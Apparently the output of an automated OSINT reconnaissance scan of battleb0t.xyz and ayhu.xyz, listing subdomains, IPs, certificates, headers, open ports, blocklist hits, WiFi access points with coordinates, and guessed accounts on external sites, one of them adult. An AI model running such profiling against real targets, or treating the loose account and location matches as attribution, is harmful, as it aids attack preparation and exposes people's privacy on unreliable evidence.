| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:C5:D7:47:EC) | 37.7642, -122.3993 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:33:68:5F) | 39.0469, -77.4903 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.125): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:30:97:DD) | 40.2024, 29.0398 |
| 2023-05-12 02:57:25 | Internet Name | No | Certificate Transparency | 0 | 1 | 1 | 0 | None | nuke.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 28 | 0 | 2 | 0 | None | 207.154.228.169 | kekw.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BDSMLR (Category: XXXPORNXXX)
https://login.bdsmlr.com | login |
| 2023-05-12 02:44:15 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| 185.199.111.153 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/fredo.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Twitter (Category: social)
https://twitter.com/Altpapier | Altpapier |
| 2023-05-12 02:48:53 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 0 | 2 | 0 | None | VirusTotal [githubusercontent.com]
https://www.virustotal.com/en/domain/githubusercontent.com/information/ | githubusercontent.com |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | ayhu.xyz. 86400 IN NS brett.ns.cloudflare.com.
ayhu.xyz. 86400 IN NS leanna.ns.cloudflare.com. | ayhu.xyz |
| 2023-05-12 03:09:55 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | plesk.keyubu.net | 87.248.157.103 |
| 2023-05-12 02:54:15 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | www.battleb0t.xyz |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | TF2 Backpack Examiner (Category: gaming)
http://www.tf2items.com/id/battleb0t/ | battleb0t |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-github-request-id: 1AD4:4FA0:AFAB37:106D10A:645DA7F4 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:31:19 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [64.226.80.0/20]
http://lists.blocklist.de/lists/all.txt | 64.226.80.0/20 |
| 2023-05-12 02:44:05 | Raw Data from RIRs | No | CertSpotter | 10 | 0 | 1 | 0 | None | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': 
u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', 
u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'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', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa | battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:97:C1) | 37.780462,-122.390564 |
| 2023-05-12 02:54:23 | HTTP Status Code | No | Web Spider | 0 | 0 | 5 | 0 | None | 403 | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.61): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.123 | 35.229.48.116 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Troop (Net ID: 00:0E:F4:ED:81:91) | 37.751, -97.822 |
| 2023-05-12 03:00:57 | Malicious Co-Hosted Site | Yes | VXVault.net | 0 | 1 | 2 | 0 | None | VXVault Malicious URL List [github.com]
http://vxvault.net/URL_List.php | github.com |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:8443 | 188.114.96.0/24 |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.108 | 35.229.48.116 |
| 2023-05-12 02:44:24 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | CN=nwapi.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0101.github.io | 185.199.111.153 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5eeb1a42bf')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="OwKUCDNMgBcJHVKY8nwcXEP4QH6PT2kVm2HBGkp44qM-1683861862-0-AWLoc992boZljuKuI-OBA8JKemVnVUC1OpOL5WA6H__Iq90123kv27raPeBnAM1gG8-u_GUHUIjkNRARNHi-eimNvmJ4rPPxMkUV2QmYUEqMIZBr0A65Rs8LmsZu82c9s9x6llue0RdEW_caMvviu63PT1rv_bBKXMf1rHRuL651jz2WFzUdCtMQpW6Egz9tRVRjq5p5DSqDh55BkcMfXifbvXVDgCJtfVyuppJGXIw1O3dWJT8pln-UY4GtVbRsMFPevbWJODfBaMma6BpIVfB3OcO1PwoUlljtOyyIFegfArGbCDdTMuWW7MTLDlShBnu-Lhu5vOc-Ud28hWS6Af2dBCBcHh5XGl_1kuftIN3x2Yrz1OgV60xO0_Ft4cvMx22_Xbt7KQegGiYk7J4oDHrBq-69T02ReScczZXd4TQyXoU9qHcKZvKsNQmpV8fSqGGhR6xiFbU8_QFDTT8jXa5OZWcXPnNRfc6AD50gDy5Q6ftPGx8ku1bIa-BYJl0tEjfjvdrLmpKOgvt9HqryqBGQGW4sUnihX9ydJUDsex46ckUHkCXeufqZn5AD6MtN5oYFRHHhtjXnJcAp8WeElzI07rPkFj51H8EcsL4wD4_j8spF714slOYp5I3UNmZcpEY7hPbC_UrXxeNbe8Vb8W4O-5IvI2tAlXSs551O3aDHuLsWbsArUO69cE4cxnurB8E2VDklGwp0UjIA1ZbCcpeAqz4V9q7Rwf-aIp9UCsMIdDd03vJdv4BEy-C0uG1-hj0OttJBemux1PqA1Oxh9yKktn6NkFswTsNgRXA8FQdJPB55BpT7hX34f--63YYznOGOdwPnDQcV50l_KNiuyd5iXvh6Ql-Y6gEkavuOPF7ZE9H3PdFRCjRHpQfMmVGrr33gOKExrD-4XicoHlXnlplsncZhnYm0eFVn58vM-kJzFzoAYzJQ6LHPK-rLwUXHzdM6AMR_OdpTBapGpYQut19xKMEhf7XFlJB3i5IvPoLlbKbnM6DASBEm9gloHgHGhLjyH1D86MFl7dLmOy7HXf9Dt59vLXRTySh361-MOVviaFEilkvPgOfzGNeoCglzenOA29aR5-LvniWcnxwdMx19GiPvWq5dL0FsY-IaI8C318jSGkDd19eYdtZYb5Trduu1XD0QykyRaGCiXFCKXs9qPoDsrChJMKxRJKG6txIjwI-hz9vzBTixzmEz31H_03qyn6xl9MHLNpR4uoY5ttVTXocR7hDlDoTIHoxw4bmwvZZns-g2xlnvOFfDm6Z3ymoAiBTVXb9UI0-FgG-KNuyY4Y49oFMfBVNbHXGX0NQ7nC0zQXw0LMG69KhyLsZAbvBSEmnEAy81l38C-eHlDjsSlcF_pEqbs8b24FlZ_Ycg5qR-qEhQLJ_IivsUFKo4fWdGLbL7vtldXPDD9ikL5U_HiqKqxo8b-MjuggAlbaMrnYqciKkrFAYhtlSn6vG0BcwQbEZVsrKxnf1U5iCKBIDK1cXcJ7qxw6FoFlpbsT9cf9V-SFcvkbQR4ynJNaf1tfeZ6cTUfprkZy8GusVJdlQcoHnz3EkTZyvTp96y0si0IlMRhE1eqk8AoDep7FzFKBEGzL7gDQU2Jn1nwjFLKXoqiHtb5T9bBlt5hhj_Ci6kEYTQdRQGW8cTzRzMqPyN66hhKyLGLcgc7GZethYHaIwxFGmc_-FTVSTksGANC23y4Y0EQ958se1s8VzeS_g_Q7AoqHmpjBZ2xnQukuWvbqKS_jTYtZPUwascKOCTAnovpYgH8wEPiBeTBcqYmCRQUV1WQ5Sl2pAf4AfP3RpDCeUM9RYjWn8EtaTb5Bhr_k9830NT-b8RF7puAAgLTTKA4q6e5vn2ewBbnV7XJ0GouaXcDgkRUitPYbV97TyYXMDG5jrso
DMwKExF3yfQ65a4HURQJ3I0-2cN6cUG-Y-wfJ_ULyEJZKHCJ0AAHYnUol27xezw1EIch91oOc2hzP8yiIMXI8T3Yo-aupeX9LKThZP5WSadqXIdAKdNvRnbMtEuMzDmhmp29m0ybwuinUP8O7RYb7j1B42foptRV6LcZaaB7GxtNFE6cbYJEgKR3EVXJ9v1X1LNujPJ_2-MknLO1BAr44SCZq4n5UiQqguKB0ip0JOSrV9oOqb3mxkBI20TA2suDdWcUUiDjuemwe_R_SFef-VIvq4m-JFV_iinHTfs5xSvQj_DV9QpslncdUm4d3a4BDcKZYMI_YaNhT37IZDWJKLAZUX_a4_bgw8NO47VSFunBOSL4CABnjTz1vyLJql2e3xxqjgafM7I6m59nuymQeY8F1qvaKmYyA1bIjmlBpJjIy-YvbCvFy0xRzKQttdY1KMKqJpm2hMaWno-PDyzEL6Hdcvve0j1uskEzjTLP_kK22Nhie7r9a88EK-EJpd4ugQ4u7t-kbsifC-M0rVW6p8dFHSbqa0iaKw84zeu6BHIQYJpq8ZELQZOExGCyk3QdEEKgtXofElfaYiQeb5hxWCA9mTHgbKSVuU6D2o">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '2801',
cRay: '7c5f8c5eeb1a42bf',
cHash: '66932cb8b087b32',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2Mi4yMjQwMDA=',
m: 'kADszgADVaHA/mRyw7h+MKSs6RoLc0QTNBq8+AYYMs8=',
i1: 'q0RPvxk//GqHpe4FgiHvYg==',
i2: 'CV688EYHriA2UWvDyWxv3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5eeb1a42bf');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5eeb1a42bf';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:54:07 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5445d12f8c1040-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.4): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MSCI (Net ID: 00:11:93:03:4B:10) | 32.8608, -79.9746 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:80 | 188.114.96.0/24 |
| 2023-05-12 03:34:01 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
| https://funny.battleb0t.xyz/images/random_3.jpg |
